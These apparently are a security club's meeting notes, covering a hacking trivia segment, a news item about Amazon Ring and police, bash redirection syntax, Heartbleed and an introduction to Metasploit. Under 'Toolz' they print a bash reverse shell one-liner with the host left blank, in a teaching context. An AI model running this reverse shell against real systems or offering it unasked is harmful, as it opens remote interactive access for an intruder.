Meeting Notes Oct. 10, 2019:

Hacker Jeopardy -> @scrypy

  • Newz:
    • This popular electronic doorbell has decided to partner with police departments and provide them easy access to footage recorded on the device. (Amazon Ring)
  • Toolz:
    • bash -i >& /dev/tcp/ 0>&1
    • redirection notes ``` There are two formats for redirecting standard output and standard error: &>word and >&word

    Of the two forms, the first is preferred. This is semantically equiva- lent to >word 2>&1

    stdin=0 - stdout=1 - stderr=2 ```

  • Knawledge:
    • This is the basic idea behind the famous Heartbleed Vulnerability

Metasploit Intro -> @scrypy

  • Basics of working through an exploit using Metasploit.